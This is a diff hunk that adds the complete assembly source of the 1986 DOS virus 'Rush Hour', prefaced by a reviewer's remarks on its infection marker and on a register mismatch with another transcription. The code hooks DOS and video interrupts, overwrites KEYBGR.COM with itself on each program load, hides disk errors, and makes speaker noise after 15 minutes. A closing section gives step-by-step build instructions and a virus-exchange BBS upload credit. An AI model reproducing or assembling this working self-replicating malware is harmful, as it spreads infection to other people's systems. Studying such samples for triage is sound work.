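Review bot: This copy carries no comments at all, so the infection-marker logic in `virus` is opaque to a reader: `mov ax,ftime / cmp ax,4800h / je exit_0` skips a KEYBGR.COM whose file time is already 09:00:00, and `mov fdate,0AA3h / mov ftime,4800h` stamps every newly written copy with that same date and time. Suggest `; already infected? marker = file time 4800h (09:00:00)` at the compare and `; stamp marker: date 0AA3h, time 4800h (same values the check above looks for)` at the two stores, since that timestamp is the most useful triage indicator in this sample. The English retype of the same program in the following hunk has those comments but its DISEASE routine pushes only AX while still executing `POP CX / POP AX`, whereas this copy pushes and pops both AX and CX; the disagreement between the two transcriptions should be noted in a comment so readers know which copy is the faithful one.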
@@ -0,0 +1,323 @@
PAGE 72,132
TITLE Virus "RUSH HOUR" (p) Foxi, 1986
NAME VIRUS
ABS0 SEGMENT AT 0
ORG 4*10H
VIDEO_INT DW 2 DUP (?) ; VIDEO INTERRUPT
; VECTOR
ORG 4*21H
DOS_INT DW 2 DUP (?) ; DOS -"-
ORG 4*24H
ERROR_INT DW 2 DUP (?) ; ERROR -"-
ABS0 ENDS
CODE SEGMENT
ASSUME CS:CODE, DS:CODE, ES:CODE
ORG 05CH
FCB LABEL BYTE
DRIVE DB ?
FSPEC DB 11 DUP (' ') ; Filename
ORG 6CH
FSIZE DW 2 DUP (?)
FDATE DW ? ; date of last
; modification
FTIME DW ? ; time -"- -"-
ORG 80H
DTA DW 128 DUP (?) ; Disk Transfer Area
ORG 071EH ; end of the normal
; KEYBGR.COM
XOR AX,AX
MOV ES,AX ; ES points to ABS0
ASSUME ES:ABS0
PUSH CS
POP DS
MOV AX,VIDEO_INT ; store old
; interrupt vectors
MOV BX,VIDEO_INT+2
MOV word ptr VIDEO_VECTOR,AX
MOV word ptr VIDEO_VECTOR+2,BX
MOV AX,DOS_INT
MOV BX,DOS_INT+2
MOV word ptr DOS_VECTOR,AX
MOV word ptr DOS_VECTOR+2,BX
CLI
MOV DOS_INT,OFFSET VIRUS ; new DOS vector
; points to
; VIRUS
MOV DOS_INT+2,CS
MOV VIDEO_INT,OFFSET DISEASE ; video vector
; points to DISEASE
MOV VIDEO_INT+2,CS
STI
MOV AH,0
INT 1AH ; read TimeOfDay (TOD)
MOV TIME_0,DX
LEA DX,VIRUS_ENDE
INT 27H ; terminate program
; remain resident.
VIDEO_VECTOR Dd (?)
DOS_VECTOR Dd (?)
ERROR_VECTOR DW 2 DUP (?)
TIME_0 DW ?
;
; VIRUS main program:
;
; 1. System call AH=4BH ?
; No : --> 2.
; Yes : Test KEYBGR.COM on specified drive
; Already infected?
; Yes : --> 3.
; No : INFECTION !
;
; 2. Jump to normal DOS
;
RNDVAL DB 'bfhg'
ACTIVE DB 0 ; not active
PRESET DB 0 ; first virus not
; active!
DB 'A:'
FNAME DB 'KEYBGR COM'
DB 0
VIRUS PROC FAR
ASSUME CS:CODE, DS:NOTHING, ES:NOTHING
PUSH AX
PUSH CX
PUSH DX
MOV AH,0 ; check if at least 15
; min.
INT 1AH ; have elapsed
; since
SUB DX,TIME_0 ; installation.
CMP DX,16384 ; (16384 ticks of the
; clock=15 min.)
JL $3
MOV ACTIVE,1 ; if so, activate
; virus.
$3: POP DX
POP CX
POP AX
; disk access
; because of the
CMP AX,4B00H ; DOS command
JE $1 ; "Load and execute
; program" ?
EXIT_1:
JMP DOS_VECTOR ; No : --> continue as normal
$1: PUSH ES ; ES:BX -->
; parameter block
PUSH BX ; DS:DX --> filename
PUSH DS ; save registers which
; will be needed
PUSH DX ; for INT 21H
; (AH=4BH)
MOV DI,DX
MOV DRIVE,0 ; Set the drive
; of the
MOV AL,DS:[DI+1] ; program to be
; executed
CMP AL,':'
JNE $5
MOV AL,DS:[DI]
SUB AL,'A'-1
MOV DRIVE,AL
$5: CLD
PUSH CS
POP DS
XOR AX,AX
MOV ES,AX
ASSUME DS:CODE, ES:ABS0
MOV AX,ERROR_INT ; Ignore all
; disk "errors"
MOV BX,ERROR_INT+2 ; with our own
; error routine
MOV ERROR_VECTOR,AX
MOV ERROR_VECTOR+2,BX
MOV ERROR_INT,OFFSET ERROR
MOV ERROR_INT+2,CS
PUSH CS
POP ES
ASSUME ES:CODE
LEA DX,DTA ; Disk Transfer Area
; select
MOV AH,1AH
INT 21H
MOV BX,11 ; transfer the
; filename
$2:
MOV AL,FNAME-1[BX] ; into FileControlBlock
MOV FSPEC-1[BX],AL
DEC BX
JNZ $2
LEA DX,FCB ; open file ( for
; writing )
MOV AH,0FH
INT 21H
CMP AL,0
JNE EXIT_0 ; file does not exist -
; -> end
MOV byte ptr fcb+20h,0 ;
MOV AX,FTIME ; file already infected ?
CMP AX,4800H
JE EXIT_0 ; YES --> END
MOV PRESET,1 ; (All copies are
; virulent !)
MOV SI,100H ; write the VIRUS in
; the file
$4:
LEA DI,DTA
MOV CX,128
REP MOVSB
LEA DX,FCB
MOV AH,15H
INT 21H
CMP SI,OFFSET VIRUS_ENDE
JL $4
MOV FSIZE,OFFSET VIRUS_ENDE - 100H
MOV FSIZE+2,0 ; set correct
; file size
MOV FDATE,0AA3H ; set correct date
; (03-05-86)
MOV FTIME,4800H ; -"- time
; (09:00:00)
LEA DX,FCB ; close file
MOV AH,10H
INT 21H
XOR AX,AX
MOV ES,AX
ASSUME ES:ABS0
MOV AX,ERROR_VECTOR ; reset the error
; interrupt
MOV BX,ERROR_VECTOR+2
MOV ERROR_INT,AX
MOV ERROR_INT+2,BX
EXIT_0:
POP DX ; restore the saved
; registers
POP DS
POP BX
POP ES
ASSUME DS:NOTHING, ES:NOTHING
MOV AX,4B00H
JMP DOS_VECTOR ; normal function execution
VIRUS ENDP
ERROR PROC FAR
IRET ; simply ignore all
; errors...
ERROR ENDP
DISEASE PROC FAR
ASSUME DS:NOTHING, ES:NOTHING
PUSH AX ; These registers will be
; destroyed!
TEST PRESET,1
JZ EXIT_2
TEST ACTIVE,1
JZ EXIT_2
IN AL,61H ; Enable speaker
AND AL,0FEH ; ( Bit 0 := 0 )
OUT 61H,AL
MOV CX,3 ; index loop CX
NOISE:
MOV AL,RNDVAL ; :
XOR AL,RNDVAL+3 ; :
SHL AL,1 ; generate NOISE
SHL AL,1 ; :
RCL WORD PTR RNDVAL,1 ; :
RCL WORD PTR RNDVAL+2,1 ; :
MOV AH,RNDVAL ; output some bit
AND AH,2 ; of the feedback
IN AL,61H ; shift register
AND AL,0FDH ; --> noise from speaker
OR AL,AH
OUT 61H,AL
EXIT_2:
POP CX
POP AX
JMP VIDEO_VECTOR ; jump to the normal
; VIDEO routine.....
DISEASE ENDP
DB 'This program is a VIRUS program.'
DB 'Once activated it has control over all'
DB 'system devices and even over all storage'
DB 'media inserted by the user. It continually'
DB 'copies itself into uninfected operating'
DB 'systems and thus spreads uncontrolled.'
DB 'The fact that the virus does not destroy any'
DB 'user programs or erase the disk is merely due'
DB 'to a philanthropic trait of the author......'
ORG 1C2AH
VIRUS_ENDE LABEL BYTE
CODE ENDS
END
; To get an executable program:
;
; 1.) Assemble and link source
; 2.) Rename EXE file to COM!
; 3.) Load renamed EXE file into DEBUG
; 4.) Reduce register CX to 300H
; 5.) Write COM file to disk with "w"
; 6.) Load COM file virus in DEBUG
; 7.) Load KEYBGR.COM
; 8.) Change addresses 71Eh ff. as follows:
; 71EH: 33 C0 8E C0 0E 1F 26
; 9.) Write KEYBGR.COM to disk with a length of 1B2A bytes
;
; Source code RUSHHOUR.ASM -- (C) 1986, foxi
;
; Taken from book "Computer Viruses - a high-tech disease"
;
; Source retyped by -=> CyberZone <=- Jon A Johnson
; U/l to Virus Exchange BBS - Sofia, Bulgaria
;
; "Have fun all you Hackers. hahaha" -->JAJ<--